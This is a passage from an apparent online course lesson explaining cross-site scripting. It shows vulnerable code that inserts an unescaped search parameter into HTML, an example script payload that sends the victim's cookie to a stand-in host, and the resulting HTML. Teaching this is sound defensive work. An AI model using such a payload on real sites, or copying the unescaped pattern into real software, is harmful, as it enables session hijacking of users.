Search⌘ K
AI Features
Home
Courses
Distributed Systems: Building Software for the Real World

Cross-Site Scripting

Explore the nature of cross-site scripting (XSS) attacks and how they exploit unescaped user input in web applications. Understand common scenarios where XSS can compromise session security and how injection attacks affect both server-side and front-end rendering. Learn protective strategies including input validation, escaping output, and using secure HTML generation tools to maintain system security in distributed environments.

We'll cover the following...

What is XSS?

Cross-site scripting (XSS) happens when a service renders a user’s input directly into HTML without applying input escaping. It’s related to injection attacks. Both take advantage of the fact that we represent structured data as sequences of ordinary characters by providing premature delimiters and unwanted commands. For example, suppose we have a service that echoes back the user’s “search” parameter in the results page. It has some server-side rendering code like this:

C++
String queryBox = "<input type='text' value='" + request.getParameter("search") + // XSS happens here. "' />";

An attacker can run a search with this nasty little query string (wrapped to fit the page):

C++
'><script>document.location='http://www.example.com/capture?id='+ document.cookie</script>'

After the server inserts that string, the resulting HTML looks like this (wrapped to fit the page):

C++
<input type='text' value=''> <script>document.location='http://www.example.com/capture?id='+ document.cookie</script>'' />

Server-side rendering

This is malformed HTML to be sure, but browsers are pretty lenient about that. When the client’s browser hits the script tag in the middle, it ...